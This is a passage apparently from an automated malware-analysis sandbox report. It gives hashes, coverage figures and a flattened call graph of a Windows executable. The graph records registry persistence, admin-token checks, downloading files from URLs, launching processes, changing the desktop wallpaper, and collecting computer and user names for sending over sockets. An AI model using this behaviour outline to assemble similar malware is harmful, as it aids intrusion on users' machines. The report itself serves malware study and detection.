                                                      • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$V12@$?assign@?$basic_string@$Split@?$basic_string@$??2@Eos@?$basic_string@Grow@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                                      • String ID:
                                                      • API String ID: 3154500504-0
                                                      • Opcode ID: 6636b44b641b77d4c97a97785cbcd8c41d41e59366c3e557b6000251a80c17ff
                                                      • Instruction ID: 1a94831c173c9211e28d46cdbba668eac71917d736910117d3345b582314b656
                                                      • Opcode Fuzzy Hash: 6636b44b641b77d4c97a97785cbcd8c41d41e59366c3e557b6000251a80c17ff
                                                      • Instruction Fuzzy Hash: FA81B472A003109BD710DE18CC8492AB7E5FBC8358F094A3EED49BB391D636EE05CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:10.9%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:19.3%
                                                      Total number of Nodes:1584
                                                      Total number of Limit Nodes:17
_initterm 4764 4131de GetStartupInfoA 4763->4764 4766 413212 GetModuleHandleA 4764->4766 4771 4133e6 #1576 4766->4771 4769 413236 exit _XcptFilter 4770->4763 4771->4769 5768 403810 WideCharToMultiByte 5771 403e60 SendMessageA #3998 SendMessageA 5768->5771 5770 403845 5771->5770 5772 403410 #4476 5773 403454 #3089 5772->5773 5774 403431 5772->5774 5775 40343b 5773->5775 5774->5773 5774->5775 5776 404410 SetCursor 6033 401110 #2302 6437 404310 6438 404333 6437->6438 6439 40433a #470 #5789 #5875 #6172 6437->6439 6440 4044c0 7 API calls 6438->6440 6441 40438a #5789 #755 6439->6441 6440->6439 6442 401f10 6443 401f30 6 API calls 6442->6443 6444 401f18 6443->6444 6445 401f28 6444->6445 6446 401f1f #825 6444->6446 6446->6445 6193 40ca19 6194 40ca26 6193->6194 6195 40ca28 #823 6193->6195 6194->6195 6038 409920 6043 4098c0 6038->6043 6041 409938 6042 40992f #825 6042->6041 6044 4098f2 #5875 6043->6044 6045 4098fb 6043->6045 6044->6045 6045->6041 6045->6042 5777 40a020 TabbedTextOutA 5778 409c20 #3797 5779 409c40 #6734 5778->5779 5780 409c36 5778->5780 5781 409c5b SendMessageA 5779->5781 5782 409c78 5779->5782 5781->5782 5783 409ce4 5782->5783 5784 409caa 5782->5784 5785 409cf6 5783->5785 5786 409ce8 InvalidateRect 5783->5786 5787 409cd4 #4284 5784->5787 5788 409cc4 #4284 5784->5788 5786->5785 5787->5785 5788->5785 6215 409a20 6220 4099c0 6215->6220 6218 409a38 6219 409a2f #825 6219->6218 6221 409a03 6220->6221 6222 4099f3 #6170 6220->6222 6221->6218 6221->6219 6222->6221 6451 409b20 6452 409b31 6451->6452 6453 409b33 #6140 6451->6453 6452->6453 6196 401220 6197 4012c2 #2379 6196->6197 6198 401233 6196->6198 6199 401243 SendMessageA KillTimer #4853 6198->6199 6200 40126b SendMessageA 6198->6200 6199->6200 6201 401285 SendMessageA 6200->6201 6202 401297 6200->6202 6201->6202 6202->6197 6203 4012a1 SendMessageA 6202->6203 6203->6197 6204 4012b8 6203->6204 6204->6197 6205 405a20 6206 405a25 6205->6206 6209 4130bb 6206->6209 6212 41308f 6209->6212 6211 405a4a 6213 4130a4 
__dllonexit 6212->6213 6214 413098 _onexit 6212->6214 6213->6211 6214->6211 6223 404620 #795 6224 404638 6223->6224 6225 40462f #825 6223->6225 6225->6224 5789 408c20 5794 408b40 5789->5794 5791 408c28 5792 408c38 5791->5792 5793 408c2f #825 5791->5793 5793->5792 5795 408bd0 5794->5795 5796 408b78 BitBlt 5794->5796 5798 408bd6 #2414 #640 5795->5798 5799 408bc1 #5785 5796->5799 5800 408bb5 #5785 5796->5800 5798->5791 5799->5798 5800->5798 5801 413427 5802 41342c 5801->5802 5805 4133fe #1168 5802->5805 5806 413421 5805->5806 5807 413418 _setmbcp 5805->5807 5807->5806 5811 407c30 OpenClipboard 5812 407c42 GlobalAlloc 5811->5812 5813 407ca9 5811->5813 5814 407c64 EmptyClipboard GlobalLock GlobalUnlock SetClipboardData CloseClipboard 5812->5814 5815 407c5b CloseClipboard 5812->5815 5814->5813 5808 40d830 inet_addr 5809 40d844 gethostbyname 5808->5809 5810 40d84f 5808->5810 5809->5810 5816 404430 5817 40447b 5816->5817 5818 40443d _TrackMouseEvent #2379 5816->5818 5821 404489 5817->5821 5823 404530 5817->5823 5822 4044a1 SetCursor #2379 5821->5822 5824 4045c1 5823->5824 5825 404552 5823->5825 5824->5821 5825->5824 5826 404559 #289 #5789 GetTextExtentPoint32A #5789 #613 5825->5826 5826->5824 6046 406930 #6215 6047 402d30 6048 402d73 #825 6047->6048 6049 402d3f 6047->6049 6050 402d40 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N #825 6049->6050 6050->6050 6051 402d72 6050->6051 6051->6048 6226 405230 6233 405369 6226->6233 6236 40525a 6226->6236 6227 405552 InvalidateRect 6232 405560 6227->6232 6228 405285 6229 4052ee 7 API calls 6228->6229 6230 40528f #4277 #923 #858 #800 #800 6228->6230 6229->6227 6230->6227 6231 40539e 6234 405430 6231->6234 6235 4053aa 7 API calls 6231->6235 6233->6227 6233->6231 6240 405390 #940 6233->6240 6237 4054b4 6234->6237 6238 405435 7 API calls 6234->6238 6235->6227 6236->6228 6239 405277 #940 6236->6239 6241 4054b8 6237->6241 6243 405503 6237->6243 6238->6227 6239->6228 6239->6239 6240->6231 6240->6240 6241->6227 
6242 4054de #6778 #6648 6241->6242 6242->6242 6244 405501 6242->6244 6243->6227 6243->6232 6245 405529 #6778 #6648 6243->6245 6244->6227 6245->6227 6245->6245 6246 40d630 6251 40d650 6246->6251 6248 40d638 6249 40d648 6248->6249 6250 40d63f #825 6248->6250 6250->6249 6252 40dad0 4 API calls 6251->6252 6253 40d680 6252->6253 6253->6248 6052 402531 6053 402543 6052->6053 6054 40253c CloseHandle 6052->6054 6055 402555 6053->6055 6056 40254e CloseHandle 6053->6056 6054->6053 6056->6055 6254 40ca3a 6257 40ca40 6254->6257 6255 40ca81 6256 40ca87 #825 6256->6255 6257->6255 6257->6256 5827 4068c0 #4837 6258 4032c0 6 API calls 6259 403334 SendMessageA #3092 6258->6259 6261 40335c SendMessageA #3092 6259->6261 6263 40337b SendMessageA #3092 6261->6263 6265 4033a0 SendMessageA 6263->6265 6266 40339d 6263->6266 6269 403cb0 FindFirstFileA 6265->6269 6266->6265 6268 4033b2 SendMessageA #3996 SendMessageA 6270 403cd9 6269->6270 6271 403ce3 6269->6271 6270->6268 6272 403e1f FindNextFileA 6271->6272 6274 403d14 sscanf 6271->6274 6272->6271 6273 403e3a FindClose 6272->6273 6273->6268 6274->6272 6275 403d38 fopen 6274->6275 6275->6272 6276 403d5c fread 6275->6276 6277 403e15 fclose 6276->6277 6281 403d7b 6276->6281 6277->6272 6278 403d8f sprintf 6279 403dd4 SendMessageA #823 SendMessageA 6278->6279 6279->6277 6281->6277 6281->6278 6281->6279 6282 401c30 inet_ntoa 6281->6282 6282->6281 6454 4043c0 #6453 #2414 6455 409fc0 TextOutA 4772 4064d0 #4710 SendMessageA SendMessageA 4816 401c70 wcscat 4772->4816 4774 406516 4775 406577 4774->4775 4776 40651d GetModuleFileNameA strrchr 4774->4776 4825 401a10 4775->4825 4777 40656c SetCurrentDirectoryA 4776->4777 4778 40655d strrchr 4776->4778 4777->4775 4778->4777 4780 406585 4781 4065e5 4780->4781 4782 40658c time 4780->4782 4835 402c40 4781->4835 4783 401a10 5 API calls 4782->4783 4783->4781 4785 4065ed __p___argc 4786 406606 4785->4786 4787 40678c 4786->4787 4788 40660f __p___argv 4786->4788 4883 407e80 SHGetFolderPathW wcslen 4787->4883 4790 
406621 4788->4790 4793 406661 __p___argv 4790->4793 4794 406652 4790->4794 4791 406793 SetWindowTextW 4886 406f80 4791->4886 4797 40666d 4793->4797 4859 407f80 fopen 4794->4859 4795 4067a9 4944 406c20 GetUserDefaultLangID GetLocaleInfoA 4795->4944 4801 4066ad __p___argv 4797->4801 4802 40669e 4797->4802 4800 4067b0 SetTimer SetTimer 4804 4066b9 4801->4804 4841 4080c0 FindFirstFileA 4802->4841 4804->4787 4807 4066ee Sleep 4804->4807 4869 401bb0 AllocateAndInitializeSid 4807->4869 4809 406734 4810 406750 sprintf 4809->4810 4811 406738 4809->4811 4875 401a90 CreateProcessA 4810->4875 4874 401b50 ShellExecuteExA 4811->4874 4814 40674b ExitProcess 4817 401cdc 4816->4817 4818 401d00 RegCreateKeyW 4817->4818 4819 401d62 RegQueryValueExA 4817->4819 4820 401d1d GetCurrentDirectoryA RegSetValueExA 4817->4820 4821 401dbb 4817->4821 4818->4817 4822 401d9e RegCloseKey 4819->4822 4823 401d90 SetCurrentDirectoryA 4819->4823 4820->4822 4821->4774 4822->4817 4824 401dc8 4822->4824 4823->4822 4824->4774 4826 401a1a fopen 4825->4826 4828 401a3a 4826->4828 4829 401a6f 4826->4829 4830 401a53 fwrite 4828->4830 4831 401a46 fread 4828->4831 4829->4780 4832 401a5e 4830->4832 4831->4832 4833 401a74 fclose 4832->4833 4834 401a66 fclose 4832->4834 4833->4780 4834->4829 4953 404b70 4835->4953 4837 402c46 4838 402c57 4837->4838 4839 402c5e LoadLibraryA 4837->4839 4838->4785 4839->4838 4840 402c73 7 API calls 4839->4840 4840->4838 4842 40820a 4841->4842 4854 408124 4841->4854 4958 401e30 4842->4958 4845 4081e4 FindNextFileA 4846 4081ff FindClose 4845->4846 4845->4854 4846->4842 4847 401e30 2 API calls 4849 408255 sprintf #537 4847->4849 4848 408158 sscanf 4848->4845 4850 408178 fopen 4848->4850 4963 4082c0 4849->4963 4850->4845 4852 408190 fread 4850->4852 4852->4854 4855 4081bd fclose 4852->4855 4854->4845 4854->4848 4854->4855 4855->4845 4855->4854 4856 408291 #537 4858 4082c0 141 API calls 4856->4858 4857 4066a5 ExitProcess 4858->4857 4860 407fd0 fread fclose 4859->4860 4868 406659 
ExitProcess 4859->4868 5333 40be90 strncpy strncpy strncpy 4860->5333 4862 408002 5334 40c4f0 4862->5334 4864 40801d 4865 40c4f0 112 API calls 4864->4865 4866 408041 4864->4866 4865->4866 4867 401a10 5 API calls 4866->4867 4866->4868 4867->4868 4870 401bf6 4869->4870 4871 401bfb CheckTokenMembership 4869->4871 4870->4809 4872 401c10 4871->4872 4873 401c14 FreeSid 4871->4873 4872->4873 4873->4809 4874->4814 4876 401b45 4875->4876 4877 401aed 4875->4877 4876->4814 4878 401af5 WaitForSingleObject 4877->4878 4879 401b26 CloseHandle CloseHandle 4877->4879 4880 401b12 4878->4880 4881 401b05 TerminateProcess 4878->4881 4879->4814 4880->4879 4882 401b1a GetExitCodeProcess 4880->4882 4881->4880 4882->4879 4884 407f02 4883->4884 4885 407f09 swprintf MultiByteToWideChar CopyFileW SystemParametersInfoW 4883->4885 4884->4791 4885->4791 5348 4076a0 4886->5348 4888 406fa8 27 API calls 4889 407119 4888->4889 4890 40711c SendMessageA #3092 4888->4890 4889->4890 4891 40713d SendMessageA #3092 4890->4891 4893 40715f SendMessageA #3092 4891->4893 4895 407181 SendMessageA #3092 4893->4895 4897 4071a3 SendMessageA #3092 4895->4897 4899 4071c5 SendMessageA #3092 4897->4899 4901 4071e7 4899->4901 4902 4071ea SendMessageA #3092 4899->4902 4901->4902 4903 407205 SendMessageA #3092 4902->4903 4905 407227 SendMessageA #3092 4903->4905 4907 407249 SendMessageA #3092 4905->4907 4909 40726b 4907->4909 4910 40726e SendMessageA #860 4907->4910 4909->4910 4911 4072a4 4910->4911 4912 4072ed #537 4911->4912 5364 404210 #858 #800 4912->5364 4914 407309 #537 5365 404210 #858 #800 4914->5365 4916 407325 #540 #2818 #535 5366 404210 #858 #800 4916->5366 4918 407369 5367 404270 4918->5367 4922 4073a8 SendMessageA SendMessageA #6140 #6140 4923 407428 4922->4923 5371 405920 4923->5371 4927 407457 5379 4058c0 4927->5379 4929 407460 5382 405180 _mbscmp 4929->5382 4931 407477 4932 405920 2 API calls 4931->4932 4933 4074ac 4932->4933 4934 405860 2 API calls 4933->4934 4935 4074b5 4934->4935 4936 4058c0 2 API 
calls 4935->4936 4937 4074be 4936->4937 4938 405180 4 API calls 4937->4938 4939 4074d5 GetTimeZoneInformation 4938->4939 5388 401e60 VariantTimeToSystemTime 4939->5388 4941 407508 SystemTimeToTzSpecificLocalTime #2818 5389 401e60 VariantTimeToSystemTime 4941->5389 4943 40759b SystemTimeToTzSpecificLocalTime #2818 #6334 #800 4943->4795 4945 406c81 SendMessageA 4944->4945 4946 406c5d 4944->4946 4947 406cc1 SendMessageA 4945->4947 4948 406ca1 SendMessageA 4945->4948 4946->4945 4950 406ae0 27 API calls 4947->4950 5396 406ae0 8 API calls 4948->5396 4951 406cdd 4950->4951 4951->4800 4952 406cba 4952->4800 4954 404b81 LoadLibraryA 4953->4954 4955 404b7a 4953->4955 4956 404b96 6 API calls 4954->4956 4957 404bf6 4954->4957 4955->4837 4956->4957 4957->4837 4990 401e60 VariantTimeToSystemTime 4958->4990 4960 401e42 4991 401de0 sprintf 4960->4991 4962 401e51 4962->4847 4964 408337 4963->4964 4965 4082fb #4278 #858 #800 4963->4965 4966 408344 4964->4966 4967 408378 time 4964->4967 4965->4964 4968 408359 #800 4966->4968 4969 40834d #1200 4966->4969 4970 40839c 4967->4970 4971 40844d time 4967->4971 4972 40828c 4968->4972 4969->4968 4970->4971 4973 4083a9 4970->4973 4971->4973 4974 408466 4971->4974 4972->4856 4972->4857 4975 4083bb 4973->4975 4976 40846c fopen 4973->4976 4974->4976 4977 4083c4 #540 time #2818 #1200 #800 4975->4977 4978 40842e #800 4975->4978 4979 4084b5 fread fclose 4976->4979 4980 408496 #800 4976->4980 4977->4978 4978->4972 4992 40be90 strncpy strncpy strncpy 4979->4992 4980->4972 4982 4084e7 4993 40c060 4982->4993 4984 408501 4985 408516 4984->4985 4986 408538 4984->4986 4987 408549 #800 4985->4987 4988 40851a #1200 time 4985->4988 4986->4987 4989 40853c #1200 4986->4989 4987->4972 4988->4987 4989->4987 4990->4960 4991->4962 4992->4982 4994 40c07f 4993->4994 5020 40bed0 4994->5020 4996 40c0ba 4997 40c0c1 4996->4997 4998 40c0e7 4996->4998 4999 40c0cc SendMessageA 4997->4999 5002 40c0db 4997->5002 5000 40c104 4998->5000 5001 40c0f8 SendMessageA 4998->5001 
4999->5002 5039 40dd00 5000->5039 5001->5000 5004 40dbf0 free 5002->5004 5005 40c173 5004->5005 5005->4984 5006 40c116 5007 40c144 5006->5007 5008 40c17b 5006->5008 5009 40c154 5007->5009 5010 40c148 SendMessageA 5007->5010 5011 40c18b 5008->5011 5012 40c17f SendMessageA 5008->5012 5042 40dbf0 5009->5042 5010->5009 5014 40c1b4 5011->5014 5015 40c1e8 5011->5015 5012->5011 5016 40c1c4 5014->5016 5017 40c1b8 SendMessageA 5014->5017 5015->5002 5018 40c1f5 SendMessageA 5015->5018 5019 40dbf0 free 5016->5019 5017->5016 5018->5002 5019->5005 5021 40bef5 5020->5021 5022 40bf0a #823 5020->5022 5021->5022 5023 40bf2e 5022->5023 5024 40bf27 5022->5024 5026 40bf46 5023->5026 5050 40baf0 5023->5050 5046 40d5e0 5024->5046 5026->4996 5029 40bf72 5029->4996 5030 40bf8a GetComputerNameA GetUserNameA 5082 40dc00 5030->5082 5033 40dd00 4 API calls 5034 40c01f 5033->5034 5035 40dc00 4 API calls 5034->5035 5036 40c038 5035->5036 5037 40dd00 4 API calls 5036->5037 5038 40c047 5037->5038 5038->4996 5040 40dc00 4 API calls 5039->5040 5041 40dd1c 5040->5041 5041->5006 5043 40dd70 5042->5043 5044 40dd8b 5043->5044 5329 412ac0 5043->5329 5044->5005 5047 40d602 5046->5047 5091 40dad0 5047->5091 5094 40ba10 5050->5094 5052 40bdf5 5052->5029 5052->5030 5053 40bb14 5053->5052 5054 40bb42 5053->5054 5099 40ba60 5053->5099 5054->5052 5103 40c8f0 #823 5054->5103 5058 40bc1b strtok 5060 40bc30 5058->5060 5074 40bbb7 5058->5074 5059 40ba60 closesocket 5062 40bc8b 5059->5062 5060->5059 5064 40bcec GetTickCount srand 5060->5064 5063 40bc92 5062->5063 5062->5064 5125 40c860 5063->5125 5066 40bdc7 5064->5066 5067 40bd07 rand 5064->5067 5070 40c860 2 API calls 5066->5070 5071 40bd1e 5067->5071 5069 40bcd8 #825 5069->5052 5073 40bde8 #825 5070->5073 5076 40ba60 closesocket 5071->5076 5079 40be11 5071->5079 5131 40ce50 5071->5131 5073->5052 5074->5058 5075 40c7b0 #825 5074->5075 5105 40c7b0 5074->5105 5109 40c920 5074->5109 5121 40c800 #823 5074->5121 5075->5058 5076->5071 5077 40be75 #825 5077->5052 
5079->5077 5137 40c740 5079->5137 5083 40dc15 5082->5083 5089 40c013 5082->5089 5084 40dc77 5083->5084 5085 40dc49 5083->5085 5083->5089 5328 412aa0 realloc 5084->5328 5327 412a90 malloc 5085->5327 5088 40dc51 5088->5089 5090 40dc8d ??0exception@@QAE@ABQBD _CxxThrowException 5088->5090 5089->5033 5090->5089 5092 40d61e 5091->5092 5093 40dadf setsockopt send shutdown closesocket 5091->5093 5092->5023 5093->5092 5095 40ba27 5094->5095 5096 40ba2b 5095->5096 5142 40b840 sprintf GetFileAttributesA 5095->5142 5096->5053 5098 40ba31 5098->5053 5100 40ba88 5099->5100 5263 40d8c0 5100->5263 5104 40bb62 strtok 5103->5104 5104->5060 5104->5074 5106 40c7d0 5105->5106 5107 40c7bb 5105->5107 5106->5074 5107->5106 5108 40c7d6 #825 5107->5108 5108->5106 5110 40c932 5109->5110 5111 40c92d ?_Xlen@std@ 5109->5111 5112 40c973 5110->5112 5113 40c963 5110->5113 5114 40c946 5110->5114 5111->5110 5117 40c990 5112->5117 5118 40c7b0 #825 5112->5118 5115 40c7b0 #825 5113->5115 5119 40c94a 5114->5119 5267 40c9c0 5114->5267 5116 40c96c 5115->5116 5116->5074 5117->5074 5118->5114 5119->5074 5122 40c81f 5121->5122 5273 40cad0 5122->5273 5124 40c844 5124->5074 5126 40c870 5125->5126 5127 40c8d9 5125->5127 5128 40c8ab #825 5126->5128 5129 40c8a2 #825 5126->5129 5127->5069 5128->5126 5130 40c8cc 5128->5130 5129->5128 5130->5069 5132 40ce68 5131->5132 5133 40ce5a 5131->5133 5135 40ce94 #825 5132->5135 5136 40bd9e #825 Sleep 5132->5136 5133->5132 5134 40ce6e #825 5133->5134 5134->5132 5135->5136 5136->5066 5136->5067 5138 40c761 5137->5138 5139 40c77e #825 5137->5139 5140 40c775 #825 5138->5140 5141 40c76f 5138->5141 5139->5079 5140->5139 5141->5139 5143 40b898 5142->5143 5144 40b95b CreateProcessA 5142->5144 5160 40b6a0 CreateDirectoryA 5143->5160 5146 40b9b4 5144->5146 5147 40b9bf WaitForSingleObject 5144->5147 5146->5098 5148 40b9e4 CloseHandle CloseHandle 5147->5148 5149 40b9d8 WaitForSingleObject 5147->5149 5148->5098 5149->5148 5150 40b8a9 5151 40b8b0 5150->5151 5152 40b8e9 sprintf 
GetFileAttributesA 5150->5152 5174 40b780 CreateDirectoryA 5151->5174 5154 40b946 CopyFileA 5152->5154 5155 40b93b 5152->5155 5154->5144 5155->5098 5156 40b8c1 5156->5152 5157 40b780 60 API calls 5156->5157 5158 40b8d9 5157->5158 5158->5152 5159 40b8e0 5158->5159 5159->5098 5182 412920 5160->5182 5163 40b6d8 DeleteFileA 5163->5150 5164 40b6ec 5185 412940 5164->5185 5166 40b719 5166->5150 5167 40b76a 5194 412a00 5167->5194 5168 412940 14 API calls 5170 40b738 sprintf 5168->5170 5191 4129e0 5170->5191 5171 40b770 5171->5150 5173 40b70e 5173->5166 5173->5167 5173->5168 5175 40b81b 5174->5175 5176 40b7ae GetTempFileNameA DeleteUrlCacheEntry URLDownloadToFileA 5174->5176 5175->5156 5177 40b810 DeleteFileA 5176->5177 5178 40b7f6 5176->5178 5177->5175 5179 40b6a0 54 API calls 5178->5179 5180 40b809 5179->5180 5180->5177 5181 40b827 DeleteFileA 5180->5181 5181->5156 5205 4127e0 #823 5182->5205 5184 40b6cf 5184->5163 5184->5164 5186 412964 5185->5186 5187 412959 5185->5187 5188 412969 5186->5188 5218 411cf0 5186->5218 5187->5173 5188->5173 5190 412982 5190->5173 5251 412990 5191->5251 5193 4129f8 5193->5173 5195 412a15 5194->5195 5196 412a09 5194->5196 5197 412a1a 5195->5197 5257 4127a0 5195->5257 5196->5171 5197->5171 5200 412a7d #825 5200->5171 5201 412a44 #825 5202 412a4d 5201->5202 5203 412a61 #825 5202->5203 5204 412a6a #825 5202->5204 5203->5204 5204->5200 5206 412815 5205->5206 5207 41287a 5205->5207 5206->5207 5208 41283d #823 5206->5208 5209 411c00 15 API calls 5207->5209 5208->5207 5210 41289d 5209->5210 5211 4128a6 5210->5211 5212 4128f8 #823 5210->5212 5213 4128e5 5211->5213 5214 4128b4 #825 5211->5214 5215 4128bd 5211->5215 5212->5184 5213->5184 5214->5215 5216 4128d6 #825 5215->5216 5217 4128cd #825 5215->5217 5216->5213 5217->5216 5219 412231 5218->5219 5220 411d11 5218->5220 5219->5190 5220->5219 5221 411ac0 free free 5220->5221 5224 411d27 5220->5224 5221->5224 5222 411d37 5222->5190 5223 411dc2 5225 411ddc 5223->5225 5227 4113e0 SetFilePointer 
SetFilePointer ReadFile 5223->5227 5224->5222 5224->5223 5226 411390 SetFilePointer SetFilePointer ReadFile 5224->5226 5228 411350 SetFilePointer SetFilePointer ReadFile 5225->5228 5226->5223 5227->5223 5229 411dfe 5228->5229 5230 411460 SetFilePointer SetFilePointer ReadFile 5229->5230 5231 411e15 5230->5231 5232 411e1c 5231->5232 5233 410a50 SetFilePointer SetFilePointer 5231->5233 5232->5190 5234 411e3e 5233->5234 5235 411e45 5234->5235 5236 411e56 #823 5234->5236 5235->5190 5237 410af0 ReadFile 5236->5237 5238 411e78 5237->5238 5239 411e83 #825 5238->5239 5240 411e9d _mbsstr 5238->5240 5239->5190 5242 411f15 _mbsstr 5240->5242 5242->5240 5243 411f2c _mbsstr 5242->5243 5243->5240 5244 411f43 _mbsstr 5243->5244 5244->5240 5245 411f5a 5244->5245 5246 411b80 SystemTimeToFileTime 5245->5246 5247 412063 LocalFileTimeToFileTime 5246->5247 5250 4120b6 5247->5250 5248 412203 5248->5190 5249 4121fa #825 5249->5248 5250->5248 5250->5249 5252 4129a3 5251->5252 5253 412998 5251->5253 5254 4129a8 5252->5254 5255 412360 28 API calls 5252->5255 5253->5193 5254->5193 5256 4129cf 5255->5256 5256->5193 5258 4127b1 5257->5258 5259 4127a9 5257->5259 5261 4127c7 5258->5261 5262 410f70 FindCloseChangeNotification #825 free free free 5258->5262 5260 411ac0 free free 5259->5260 5260->5258 5261->5200 5261->5201 5261->5202 5262->5261 5265 40d8ec 5263->5265 5264 40daad closesocket 5266 40baa8 5264->5266 5265->5264 5265->5266 5266->5054 5268 40c9f6 #823 5267->5268 5272 40ca40 5268->5272 5270 40ca81 5270->5117 5271 40ca87 #825 5271->5270 5272->5270 5272->5271 5274 40cbf3 5273->5274 5275 40cb00 5273->5275 5274->5124 5276 40cb26 5275->5276 5282 40cb90 5275->5282 5277 40cb31 5276->5277 5278 40cb2c ?_Xran@std@ 5276->5278 5292 40cd80 5277->5292 5278->5277 5279 40cbe9 5281 40cc60 5 API calls 5279->5281 5281->5274 5282->5279 5284 40cbaa 5282->5284 5283 40cb38 5286 40cb6a 5283->5286 5287 40cb47 memmove 5283->5287 5285 40c7b0 #825 5284->5285 5288 40cbb3 5285->5288 5290 40cd80 4 API calls 5286->5290 
5309 40cc60 5287->5309 5288->5124 5291 40cb7d 5290->5291 5291->5124 5293 40cd93 5292->5293 5294 40ce27 5292->5294 5293->5294 5295 40cdd0 5293->5295 5296 40cdc9 ?_Xlen@std@ 5293->5296 5294->5283 5297 40cdf8 5295->5297 5300 40cde2 5295->5300 5296->5295 5298 40ce0a 5297->5298 5299 40cdfc 5297->5299 5298->5294 5305 40c7b0 #825 5298->5305 5301 40c7b0 #825 5299->5301 5302 40cde6 5300->5302 5303 40ce1f 5300->5303 5304 40ce05 5301->5304 5306 40c7b0 #825 5302->5306 5307 40c9c0 2 API calls 5303->5307 5304->5283 5305->5303 5308 40cdf3 5306->5308 5307->5294 5308->5283 5310 40cc73 5309->5310 5311 40cc6e ?_Xlen@std@ 5309->5311 5312 40cd04 5310->5312 5313 40cc88 5310->5313 5314 40ccae 5310->5314 5311->5310 5312->5313 5319 40cd08 5312->5319 5315 40cc90 5313->5315 5318 40c9c0 2 API calls 5313->5318 5317 40ccd9 #825 5314->5317 5321 40ccc4 5314->5321 5315->5286 5316 40cd4c 5322 40c9c0 2 API calls 5316->5322 5317->5321 5318->5315 5319->5315 5319->5316 5320 40cd43 #825 5319->5320 5323 40cd26 5319->5323 5320->5316 5321->5286 5324 40cd5d 5322->5324 5325 40c9c0 2 API calls 5323->5325 5324->5286 5326 40cd3b 5325->5326 5326->5286 5327->5088 5328->5088 5330 412af5 5329->5330 5331 412ac8 free 5329->5331 5330->5044 5331->5330 5333->4862 5335 40c50f 5334->5335 5336 40bed0 110 API calls 5335->5336 5337 40c54b 5336->5337 5338 40c596 5337->5338 5339 40dd00 4 API calls 5337->5339 5340 40dbf0 free 5338->5340 5342 40c568 5339->5342 5341 40c5e7 5340->5341 5341->4864 5342->5338 5343 40c600 5342->5343 5344 40c635 5343->5344 5345 40c617 strncpy 5343->5345 5346 40dbf0 free 5344->5346 5345->5344 5347 40c650 5346->5347 5347->4864 5349 4076d9 time 5348->5349 5351 4076d7 5349->5351 5350 407771 sprintf 5350->5351 5351->5349 5351->5350 5352 405180 4 API calls 5351->5352 5353 407842 SendMessageA SendMessageA #540 5351->5353 5352->5351 5354 407894 5353->5354 5355 4078aa _ftol #2818 #2818 5354->5355 5356 4078db #2818 #2818 5354->5356 5357 407911 #3092 #6199 5355->5357 5356->5357 5358 407990 #800 5357->5358 5359 
407940 5357->5359 5358->4888 5359->5358 5360 407952 InvalidateRect 5359->5360 5361 405920 2 API calls 5360->5361 5362 407978 5361->5362 5363 405920 2 API calls 5362->5363 5363->5358 5364->4914 5365->4916 5366->4918 5390 4044c0 5367->5390 5370 404210 #858 #800 5370->4922 5394 405950 InvalidateRect 5371->5394 5373 40592d 5395 405970 InvalidateRect 5373->5395 5375 40593e 5376 405860 5375->5376 5377 405872 5376->5377 5378 405875 GetClientRect #6197 5376->5378 5377->5378 5378->4927 5380 4058d2 5379->5380 5381 4058d5 GetClientRect #6197 5379->5381 5380->5381 5381->4929 5383 4051f8 5382->5383 5384 40519e #860 5382->5384 5383->4931 5385 4051b1 5384->5385 5386 4051d1 RedrawWindow 5385->5386 5387 4051ea InvalidateRect 5385->5387 5386->4931 5387->5383 5388->4941 5389->4943 5391 4044f8 GetObjectA CreateFontIndirectA #1641 5390->5391 5392 4044ce GetParent #2864 SendMessageA #2860 5390->5392 5393 40427a #2818 #535 5391->5393 5392->5391 5392->5393 5393->5370 5394->5373 5395->5375 5397 406b88 #537 #924 sprintf #800 #800 5396->5397 5398 406bda 5396->5398 5397->5398 5401 406cf0 5398->5401 5400 406be6 #800 5400->4952 5402 406d16 5401->5402 5403 406d19 SendMessageA #353 SendMessageA #1979 5401->5403 5402->5403 5406 406dc0 SendMessageA #823 5403->5406 5407 406e00 SendMessageA 5406->5407 5408 406d7b #665 5406->5408 5410 406ed2 #825 5407->5410 5411 406e2f _strnicmp 5407->5411 5408->5400 5410->5408 5412 406e4b _strnicmp 5411->5412 5413 406e67 5411->5413 5412->5413 5413->5410 5413->5411 5414 406e87 SendMessageA #6136 5413->5414 5414->5413 6058 4059d0 #561 5415 40dad0 5416 40db33 5415->5416 5417 40dadf setsockopt send shutdown closesocket 5415->5417 5417->5416 6456 40dbd0 6457 40dbf0 free 6456->6457 6458 40dbd8 6457->6458 6459 40dbe8 6458->6459 6460 40dbdf #825 6458->6460 6460->6459 5418 40bed0 5419 40bef5 5418->5419 5420 40bf0a #823 5418->5420 5419->5420 5421 40bf2e 5420->5421 5422 40bf27 5420->5422 5424 40bf46 5421->5424 5425 40baf0 99 API calls 5421->5425 5423 40d5e0 4 API calls 
5422->5423 5423->5421 5426 40bf6b 5425->5426 5427 40bf72 5426->5427 5428 40bf8a GetComputerNameA GetUserNameA 5426->5428 5429 40dc00 4 API calls 5428->5429 5430 40c013 5429->5430 5431 40dd00 4 API calls 5430->5431 5432 40c01f 5431->5432 5433 40dc00 4 API calls 5432->5433 5434 40c038 5433->5434 5435 40dd00 4 API calls 5434->5435 5436 40c047 5435->5436 5828 404cd0 5833 404cf0 #2414 #2414 #800 #641 5828->5833 5830 404cd8 5831 404ce8 5830->5831 5832 404cdf #825 5830->5832 5832->5831 5833->5830 6057 4019d0 EnableWindow 6059 404dd0 6 API calls 6060 404e3b SendMessageA #3092 6059->6060 6062 404e60 SendMessageA #3092 6060->6062 6064 404e93 SendMessageA 6062->6064 6065 404e7f SendMessageA 6062->6065 5447 4102d0 free 5834 4130d4 ??1type_info@@UAE 5835 4130e3 #825 5834->5835 5836 4130ea 5834->5836 5835->5836 6283 4086e0 #470 GetClientRect SendMessageA #6734 #323 6284 408765 6283->6284 6285 408838 6284->6285 6288 4087bd CreateCompatibleDC #1640 6284->6288 6286 408885 #2754 6285->6286 6287 408869 FillRect 6285->6287 6289 408897 #2381 6286->6289 6287->6289 6315 409e70 CreateCompatibleBitmap #1641 6288->6315 6292 4088b4 6289->6292 6293 408a7d 6289->6293 6292->6293 6295 4088be #3797 6292->6295 6297 409f80 BitBlt 6293->6297 6311 408a5e 6293->6311 6294 408809 6316 409f10 6294->6316 6298 408901 _ftol 6295->6298 6300 408abe 6297->6300 6305 